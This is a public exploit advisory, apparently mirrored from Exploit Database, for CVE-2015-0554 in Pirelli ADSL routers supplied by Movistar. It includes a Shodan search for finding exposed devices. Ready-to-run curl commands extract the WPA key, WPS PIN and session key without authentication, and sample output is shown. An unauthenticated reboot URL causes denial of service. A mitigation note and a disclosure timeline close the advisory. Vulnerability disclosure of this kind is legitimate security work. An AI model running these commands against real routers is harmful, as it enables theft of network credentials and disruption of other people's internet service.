Pirelli ADSL2/2+ Wireless Router P.DGA4001N – Information Disclosure

• Exploit Database
• 127 阅读

• 作者： Eduardo Novella
  日期： 2015-01-07
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/35721/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129

  - Title:   CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001Nremote information disclosure HomeStation Movistar   - Author:   Eduardo Novella@enovella_ ednolo[@]inf.upv[dot]es   - Version:   Tested on firmware version PDG_TEF_SP_4.06L.6     - Shodan dork : + "Dropbear 0.46 country:es"( From now on it looks like not working on this way)     - Summary:   HomeStation movistar has deployed routers manufactured by Pirelli. These routers are vulnerable to fetch HTML code from any IP public over the world. Neither authentication nor any protection to avoid unauthorized extraction of sensitive information.     - The vulnerability and the way to exploit it:     $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_" <option value=&apos;0&apos;>WLAN_DEAD</option>   $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey" var wpaPskKey = &apos;IsAklFHhFFui1sr9ZMqD&apos;;   $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin" var WscDevPin= &apos;12820078&apos;;   $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey" var sessionKey=&apos;1189641421&apos;;   $ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3 <td width="50">BSSID:</td> <td> DC:0B:1A:XX:XX:XX </td>       # Rebooting the router remotely and provoking a Denial of Service #----------------------------------------------------------------- http://${IP_ADDRESS}/resetrouter.html   We can observe at the source: <!-- hide   var sessionKey=&apos;846930886&apos;; function btnReset() { var loc = &apos;rebootinfo.cgi?&apos;;   loc += &apos;sessionKey=&apos; + sessionKey;   var code = &apos;location="&apos; + loc + &apos;"&apos;; eval(code); }   // done hiding -->     http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123     # All the information what we can fetch from. #---------------------------------------------- webs$ ls adslcfgadv.html diagpppoe.htmlipv6lancfg.htmlqoscls.htmlstatsatmreset.html adslcfgc.html dlnacfg.htmljs qosqmgmt.htmlstatsifc.html adslcfg.htmldnscfg.html jsps qosqueueadd.html statsifcreset.html adslcfgtone.htmldnsproxycfg.htmllancfg2.html qsmain.htmlstatsmocalanreset.html algcfg.html dsladderr.htmllanguagesquicksetuperr.html statsmocareset.html APISdslbondingcfg.htmllockerror.html quicksetup.htmlstatsmocawanreset.html atmdelerr.htmlenblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html backupsettings.html enblservice.htmllogintro.htmlquicksetuptestsucc.htmlstatsvdslreset.html berrun.html engdebug.html logobkg.gifrebootinfo.htmlstatswanreset.html berstart.html ethadderr.htmllogoc.gifresetrouter.html statsxtmreset.html berstop.htmlethdelerr.htmllogo_corp.gifrestoreinfo.html storageusraccadd.html certadd.htmlfooter.html logo.htmlrouteadd.htmlstylemain.css certcaimport.html hlpadslsync.htmllogomenu.gif rtdefaultcfgerr.html threeGPIN.html certimport.html hlpatmetoe.html main.htmlrtdefaultcfg.htmltodadd.html certloadsigned.html hlpatmseg.htmlmenuBcm.js scdmz.html tr69cfg.html cfgatm.html hlpethconn.html menu.htmlscinflt.html updatesettings.html cfgeth.html hlppngdns.htmlmenuTitle.js scmacflt.htmlupload.html cfgl2tpac.htmlhlppnggw.html menuTree.jsscmacpolicy.html uploadinfo.html cfgmoca.htmlhlppppoasess.html mocacfg.html scoutflt.htmlupnpcfg.html cfgptm.html hlppppoeauth.html multicast.html scprttrg.htmlurl_add.html colors.csshlppppoeconn.html natcfg2.html scriptsutil.js config.json.txt hlppppoeip.html ntwksum2.htmlscvrtsrv.htmlwanadderr.html css hlptstdns.htmlomcidownload.htmlseclogintro.html wancfg.html ddnsadd.htmlhlpusbconn.html omcisystem.htmlsnmpconfig.htmlwlcfgadv.html defaultsettings.htmlhlpwlconn.htmlpassword.htmlsntpcfg.html wlcfg.html dhcpinfo.html htmlportmapadd.htmlstandby.html wlcfgkey.html diag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html diagbr.html ifcgateway.html portName.jsStaticIpErr.html wlrefresh.html diag.html imagespppoe.html statsadslerr.htmlwlsecurity.html diagipow.html index.htmlpradd.html statsadsl.html wlsetup.html diaglan.htmlinfo.html ptmadderr.html statsadslreset.htmlwlwapias.html diagmer.htmlipoacfg.htmlptmdelerr.html statsatmerr.html xdslcfg.html diagpppoa.htmlippcfg.html pwrmngt.html statsatm.html       + Conclusion:   This vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network or even worse being a member of a botnet without knowledge of it. First mitigation could beeither try to update the last version for these routers or install 3rd parties firmwares as OpenWRT or DDWRT on them.       + References:   http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html       + Timeline:   2013-04-xx Send email to Movistar and Pirelli 2015-01-05 Full disclosure